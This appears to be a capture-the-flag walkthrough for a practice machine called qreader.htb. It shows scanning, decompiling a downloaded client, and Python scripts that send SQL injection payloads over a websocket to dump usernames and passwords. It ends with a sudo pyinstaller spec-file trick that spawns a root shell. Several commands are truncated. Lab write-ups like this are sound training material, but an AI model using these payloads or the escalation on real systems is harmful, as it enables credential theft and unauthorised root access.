Machine Link :

Machine IP :


Nmap Result

sudo nmap -sV -sC -A

Scan Result:

22 tcp open port for ssh

80 tcp open port for http

Websocket on port 5789

let’s do a vulnerability scan of websocket in port 5789 with STEWS

python3 -1 -n -u

We came to know about a vulnerable url which is ws://qreader.htb:5789

Browsing Website :

Now add this qreader.htb to /etc/hosts

Now access the website http://qreader.htb/ through your browser.

Through this website we can generate and scan a qr code.

Also we can download the software for windows and linux so, let’s download the .exe file and decompile it using pyinstxtractor.

python3 qreader.exe

Now go to extracted folder & and examine the qreader.pyc file.

pip3 install uncompyle6

uncompyle6 qreader.pyc >

After analyzing the file we found the vulnerability as you can see below.

Let’s make a python script to exploit the SQL Injection found in the above source code.

from websocket import create_connection
import json
ws_host = 'ws://qreader.htb:5789'
VERSION = '0.0.3" UNION SELECT group_concat(answer),"2","3","4" FROM answers;-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()

Above code will print all the user as shown below.

Lets write a code to print password of user.

from websocket import create_connection
import json
ws_host = 'ws://qreader.htb:5789'
VERSION = '0.0.3" UNION SELECT username,password,"3","4" from users;-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()

As you can see we got our password and we can decrypt this at website as shown below.

Now it time to login via ssh.

Now copy your user flag.

Running sudo -l to see any command which we can run as root without password. can be run as root without password.

Command used

echo 'import os;os.system("/bin/bash")' > root.spec

sudo /usr/local/sbin/ build root.spec

As you can see we got our root flag.

Thankyou For Reading.



